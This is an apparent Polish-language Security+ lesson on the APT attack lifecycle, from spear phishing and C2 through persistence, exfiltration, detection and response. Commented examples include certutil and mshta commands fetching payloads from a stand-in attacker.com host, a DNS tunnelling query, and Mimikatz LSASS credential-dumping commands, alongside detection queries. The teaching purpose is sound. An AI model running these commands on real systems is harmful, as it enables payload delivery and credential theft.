Cykl życia APT: od początkowego dostępu do utrzymania dostępu
Prześledź działanie APT od początkowego dostępu uzyskanego przez spear phishing, przez ustanowienie C2 i eskalację uprawnień, po mechanizmy utrzymania dostępu przetrzymujące ponowne uruchomienie i ponowną instalację systemu.
Cykl życia APT: od początkowego dostępu do utrzymania dostępu to bezpłatna lekcja Security+ Academy na CoddyKit. To lekcja 1 z 4. Możesz przeczytać całą lekcję poniżej za darmo — a potem ćwiczyć ją interaktywnie w przeglądarce z wbudowanym edytorem kodu i tutorem AI dostępnym 24/7. To część ścieżki edukacyjnej Security+ Academy, a Twój postęp synchronizuje się między webem a aplikacją CoddyKit. Kurs Security+ Academy zawiera 4 lekcji w sumie.
Czym jest zaawansowane zagrożenie trwałe?
Zaawansowane zagrożenie trwałe (Advanced Persistent Threat, APT) to wyrafinowana, długotrwała kampania cyberataków, zazwyczaj prowadzona przez aktorów państwowych lub dobrze finansowane grupy przestępcze, mająca określone cele strategiczne. Trzy cechy definiujące APT to: zaawansowanie — wykorzystanie niestandardowego złośliwego oprogramowania, ataków zero-day i nowych technik; trwałość — utrzymywanie ukrytej obecności przez miesiące lub lata, a nie przeprowadzenie szybkiego ataku i odwrotu; zagrożenie — skoordynowany, ukierunkowany atak na konkretną organizację. Do znanych grup APT należą APT28 (Fancy Bear), powiązana z rosyjskim GRU, APT41, powiązana z Chinami, oraz Lazarus Group, powiązana z Koreą Północną.
Uzyskanie początkowego dostępu: jak APT dostają się do systemu
Kampanie APT zazwyczaj rozpoczynają się od jednej z niewielu sprawdzonych technik uzyskiwania początkowego dostępu. Najczęstszą metodą jest spear phishing z uzbrojonymi załącznikami lub odnośnikami wyłudzającymi dane uwierzytelniające — wiadomość wygląda, jakby pochodziła od zaufanego współpracownika lub partnera. Naruszenie łańcucha dostaw (jak w przypadku SolarWinds/SUNBURST) polega na wstawieniu złośliwego kodu do zaufanych aktualizacji oprogramowania. Wykorzystanie usług dostępnych z Internetu (urządzeń VPN, serwerów Exchange, aplikacji internetowych) odbywa się za pomocą niezałatanych luk CVE. Ataki watering hole polegają na przejęciu stron internetowych często odwiedzanych przez pracowników organizacji będącej celem i dostarczeniu odwiedzającym exploitów uruchamianych podczas samej wizyty.
Wykonanie: uruchomienie pierwszego ładunku
Po uzyskaniu początkowego dostępu atakujący musi uruchomić pierwszy ładunek w systemie celu. Grupy APT preferują techniki, które przypominają normalną aktywność systemu: złośliwe makra w dokumentach pakietu Office, uruchamiane po włączeniu zawartości przez ofiarę; pliki HTML Application (HTA), które wykonują skrypty po otwarciu; oraz Living-off-the-Land Binaries (LOLBins) — używanie legalnych narzędzi systemu Windows, takich jak mshta.exe, certutil.exe, regsvr32.exe czy wscript.exe, do wykonywania kodu atakującego i omijania list dozwolonych aplikacji. Techniki te utrudniają odróżnienie początkowych ładunków od prawidłowej aktywności systemu.
# Example LOLBin abuse: certutil used to download payload
# certutil.exe -urlcache -split -f http://attacker.com/payload.exe payload.exe
# Example: mshta executing remote HTA
# mshta.exe http://attacker.com/malicious.hta
# Detection: alert on certutil/mshta with network connectionsUstanowienie C2: nawiązanie połączenia z serwerem
Po uruchomieniu początkowego ładunku zostaje ustanowiony kanał Command and Control (C2) łączący system z infrastrukturą atakującego. Współczesne rozwiązania C2 stosowane przez grupy APT wykorzystują techniki zaprojektowane w celu uniknięcia wykrycia: HTTPS z domenami łudząco podobnymi do legalnych usług chmurowych (Teams, OneDrive, GitHub); tunelowanie DNS — kodowanie poleceń w zapytaniach o rekordy DNS TXT, które wyglądają jak zwykły ruch DNS; algorytmy generowania domen (DGA), które na podstawie ziarna codziennie tworzą nową domenę C2, przez co blokowanie domen staje się nieskuteczne; oraz C2 typu living-off-the-land, wykorzystujące legalne platformy chmurowe (API Slack, Arkusze Google, Twitter) jako kanał komunikacji.
# DNS tunneling detection: look for unusually long DNS queries
# Normal DNS query: www.google.com (13 chars)
# DNS tunnel query: 4f72d3a1b9c2e5f8.exfil.attacker.com (38 chars of encoded data)
# Zeek/Bro detection rule concept:
# alert dns (dns.qname length > 50)Rozpoznanie: mapowanie środowiska
Po ustanowieniu C2 aktorzy APT przeprowadzają rozpoznanie wewnętrzne, aby zrozumieć środowisko przed przejściem do kolejnych etapów. Obejmuje to: wyliczanie elementów Active Directory za pomocą narzędzi takich jak BloodHound w celu zmapowania relacji zaufania i zidentyfikowania celów o wysokiej wartości; skanowanie sieci w celu wykrycia aktywnych hostów, usług i otwartych portów; wykrywanie danych uwierzytelniających przez przeszukiwanie systemów plików w poszukiwaniu plików konfiguracyjnych, baz haseł lub danych zapisanych w przeglądarkach; oraz wyliczanie tożsamości w celu identyfikacji kont uprzywilejowanych, kont usług i stacji roboczych administratorów. Większość działań rozpoznawczych wykorzystuje natywne narzędzia systemu Windows (net user /domain, ipconfig, nltest), aby uniknąć wykrycia.
# Native Windows commands used by APTs for discovery
# net user /domain # list domain users
# net group 'Domain Admins' /domain # list domain admins
# ipconfig /all # network configuration
# netstat -ano # active network connections
# tasklist /v # running processesEskalacja uprawnień: uzyskanie uprawnień administratora
Grupy APT zazwyczaj uzyskują początkowy dostęp za pomocą poświadczeń użytkownika o ograniczonych uprawnieniach i muszą eskalować uprawnienia, aby osiągnąć swoje cele. Typowe ścieżki eskalacji obejmują: kradzież poświadczeń z pamięci za pomocą Mimikatz (wydobywanie skrótów NTLM z pamięci procesu LSASS); Kerberoasting (pobieranie biletów usług dla kont usług i łamanie ich w trybie offline); wykorzystywanie błędnie skonfigurowanych usług ze słabymi uprawnieniami (niebezpieczne ścieżki plików binarnych usług, przejęcie bibliotek DLL); oraz podszywanie się pod token w celu kradzieży tokenu uwierzytelniania uprzywilejowanego procesu. Techniki omijania funkcji User Account Control (UAC) umożliwiają przejście ze standardowego administratora do konta SYSTEM bez wyświetlenia monitu UAC.
# Mimikatz: dump credentials from LSASS memory
# (defender perspective - what attackers run)
# privilege::debug
# sekurlsa::logonpasswords
# Detection: alert on LSASS memory reads by non-system processes
# Windows Event ID 4656/4663: access to LSASS processMechanizmy utrwalania obecności: przetrwanie ponownych uruchomień
Grupy APT intensywnie inwestują w mechanizmy utrwalania obecności, które przetrwają ponowne uruchomienie i ponowne obrazowanie systemu, ponieważ uzyskanie początkowego dostępu mogło być trudne i kosztowne. Typowe techniki utrwalania obecności w systemie Windows to: klucze rejestru Run (HKLM\Software\Microsoft\Windows\CurrentVersion\Run); zadania harmonogramu, które regularnie uruchamiają złośliwe oprogramowanie; usługi Windows uruchamiane automatycznie; subskrypcje zdarzeń WMI (trudne do wykrycia, przetrwają większość działań czyszczących); przejęcie kolejności wyszukiwania bibliotek DLL; oraz implanty rozruchowe i przed uruchomieniem systemu (implanty oprogramowania układowego UEFI, które przetrwają ponowną instalację systemu operacyjnego i były wykorzystywane przez grupę Equation oraz aktorów powiązanych z NSA).
# Common persistence locations to monitor
# Registry:
# HKLM\Software\Microsoft\Windows\CurrentVersion\Run
# HKCU\Software\Microsoft\Windows\CurrentVersion\Run
# HKLM\System\CurrentControlSet\Services
# Check scheduled tasks for suspicious entries
# schtasks /query /fo LIST /v | findstr 'Task Name\|Run As User\|Task To Run'Unikanie wykrycia: ukrywanie się na widoku
APT stosują rozbudowane techniki unikania wykrycia, aby uniknąć wykrycia przez narzędzia zabezpieczeń punktów końcowych i analityków. Techniki te obejmują: wstrzykiwanie do procesów — wstrzykiwanie złośliwego kodu do legalnych procesów, takich jak explorer.exe lub svchost.exe, dzięki czemu złośliwe oprogramowanie działa pod zaufaną nazwą procesu; modyfikowanie znaczników czasu — zmienianie znaczników czasu plików, aby złośliwe pliki wyglądały na istniejące od wielu lat; usuwanie i fałszowanie dzienników — czyszczenie dzienników zdarzeń systemu Windows w celu usunięcia dowodów; nadużywanie certyfikatów podpisywania kodu — podpisywanie złośliwego oprogramowania skradzionymi legalnymi certyfikatami; oraz wykonywanie w pamięci (złośliwe oprogramowanie bezplikowe), które nigdy nie zapisuje się na dysku, gdzie mogłoby zostać wykryte przez program antywirusowy oparty na analizie plików.
Eksfiltracja: potajemna kradzież danych
APT starannie zarządzają eksfiltracją danych, aby nie uruchomić mechanizmów DLP ani wykrywania anomalii przepustowości. Techniki te obejmują: przygotowanie danych — gromadzenie wybranych danych w zaszyfrowanym archiwum przed eksfiltracją w małych porcjach przez wiele dni; eksfiltrację za pośrednictwem HTTPS do usług przechowywania danych w chmurze (OneDrive, Dropbox), które są dozwolone przez reguły firmowej zapory sieciowej; steganografię — ukrywanie danych w plikach graficznych; oraz eksfiltrację zależną od czasu w godzinach pracy, aby zatuszować ją wśród legalnego ruchu. APT eksfiltrują tylko to, czego potrzebują (cenną własność intelektualną, dane uwierzytelniające, plany strategiczne), zamiast kopiować wszystko masowo — minimalizując swój ślad i prawdopodobieństwo wykrycia.
Wykrywanie aktywności APT: kluczowe wskaźniki
Wykrywanie APT wymaga wyjścia poza analizę pojedynczych alertów i rozpoznawania wzorców powiązanej aktywności w całym łańcuchu ataku. Kluczowe wskaźniki obejmują: nietypowe relacje proces nadrzędny–proces potomny (np. uruchamianie PowerShell przez program Word); zakodowane polecenia PowerShell lub pobieranie danych z Internetu; zadania zaplanowane lub usługi utworzone o nietypowych porach; dostęp do pamięci LSASS przez procesy niesystemowe; ruch boczny za pośrednictwem SMB lub WMI ze stacji roboczych; oraz nietypowe wychodzące zapytania DNS z długimi nazwami subdomen. MITRE ATT&CK Navigator umożliwia obrońcom mapowanie wykrytych technik na macierz ATT&CK i identyfikowanie luk w zakresie monitorowania.
# Splunk query: detect PowerShell encoded command execution
# index=windows source=WinEventLog:Security EventCode=4688
# | search NewProcessName='*powershell*' CommandLine='*-enc*'
# | table _time, ComputerName, SubjectUserName, CommandLineReagowanie na APT: izolowanie bez alarmowania napastnika
Reagowanie na aktywne APT wymaga zachowania równowagi: izolowania zagrożenia bez alarmowania napastnika. Zbyt wczesne odizolowanie (zablokowanie ruchu C2, wyłączenie kont) może spowodować uruchomienie przez APT destrukcyjnych ładunków lub przyspieszenie eksfiltracji. Zalecane praktyki obejmują: potajemne monitorowanie podczas gromadzenia informacji; stopniowe segmentowanie zainfekowanych hostów za pomocą reguł zapory, bez blokowania C2; wdrażanie technologii decepcyjnych (honeytokeny, konta canary) do monitorowania aktywności napastnika; oraz koordynację z organami ścigania przed podjęciem poważnych działań izolacyjnych. Pełne usunięcie zagrożenia wymaga zidentyfikowania wszystkich mechanizmów utrwalania dostępu i przejętych kont — pominięcie choćby jednego implantu oznacza, że napastnik powróci.
Szybki test
Sprawdź swoją znajomość zagadnień CompTIA Security+ (SY0-701) omówionych w tej lekcji.
Podsumowanie lekcji
W tej lekcji poznali Państwo następujące zagadnienia: APT to zaawansowane, trwałe i ukierunkowane kampanie, które zazwyczaj działają przez wiele miesięcy, wykorzystując spear phishing, ataki na łańcuch dostaw lub wykorzystanie luk w celu uzyskania początkowego dostępu; APT wykorzystują LOLBins i legalne usługi chmurowe do komunikacji C2, aby upodobnić się do normalnego ruchu i uniknąć wykrycia; a mechanizmy utrwalania dostępu obejmują zarówno klucze Run w Rejestrze, jak i implanty w oprogramowaniu układowym UEFI — przy czym subskrypcje WMI są szczególnie trudne do wykrycia i usunięcia. Następnie omówimy techniki ruchu bocznego, w tym Pass-the-Hash i Pass-the-Ticket.
Często zadawane pytania
Czy lekcja „Cykl życia APT: od początkowego dostępu do utrzymania dostępu” jest bezpłatna?
Tak — pełny tekst „Cykl życia APT: od początkowego dostępu do utrzymania dostępu” jest dostępny za darmo tutaj w sieci. Aby ćwiczyć ją interaktywnie (wbudowany edytor kodu i tutor AI dostępny 24/7) i odblokować resztę kursu Security+ Academy, przejdź na CoddyKit PRO. Kurs Security+ Academy zawiera 4 lekcji w sumie.
Co nauczysz się w „Cykl życia APT: od początkowego dostępu do utrzymania dostępu”?
Prześledź działanie APT od początkowego dostępu uzyskanego przez spear phishing, przez ustanowienie C2 i eskalację uprawnień, po mechanizmy utrzymania dostępu przetrzymujące ponowne uruchomienie i po… Ćwiczysz Security+ Academy z praktycznym kodem, który uruchamiasz bezpośrednio w przeglądarce, a tutor AI dostępny 24/7 odpowiada na Twoje pytania podczas pracy nad lekcją.
Czy potrzebuję doświadczenia, aby zacząć Security+ Academy?
Nie wymagamy żadnego doświadczenia. Security+ Academy w CoddyKit jest strukturyzowany dla początkujących i zaawansowanych użytkowników, więc możesz zacząć tutaj lub od początku i uczyć się w swoim tempie. To lekcja 1 z 4.
Ile czasu zajmuje lekcja „Cykl życia APT: od początkowego dostępu do utrzymania dostępu”?
Większość lekcji CoddyKit trwa około 5–10 minut. Każda lekcja to mały, interaktywny krok, dzięki czemu robisz systematyczne postępy i zawsze wracasz dokładnie do tego samego miejsca — na webie i w aplikacji.
Czy mogę pisać i uruchamiać kod w tej lekcji Security+ Academy?
Tak. Każda lekcja Security+ Academy zawiera wbudowany edytor kodu, więc piszesz i uruchamiasz prawdziwy kod bezpośrednio w przeglądarce i od razu otrzymujesz sprzężenie zwrotne od AI — bez konfiguracji na komputerze.
Wszystkie lekcje w tym kursie
- Cykl życia APT: od początkowego dostępu do utrzymania dostępu
- Ruch boczny: Pass-the-Hash i Pass-the-Ticket
- Kerberoasting i ataki Golden Ticket
- Framework MITRE ATT&CK do wykrywania i reagowania